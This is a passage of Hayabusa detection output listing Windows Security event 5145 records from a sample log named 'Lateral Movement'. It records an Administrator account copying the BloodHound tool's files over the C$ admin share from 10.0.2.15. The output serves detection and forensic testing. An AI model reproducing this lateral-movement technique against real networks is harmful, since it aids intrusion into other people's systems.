Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 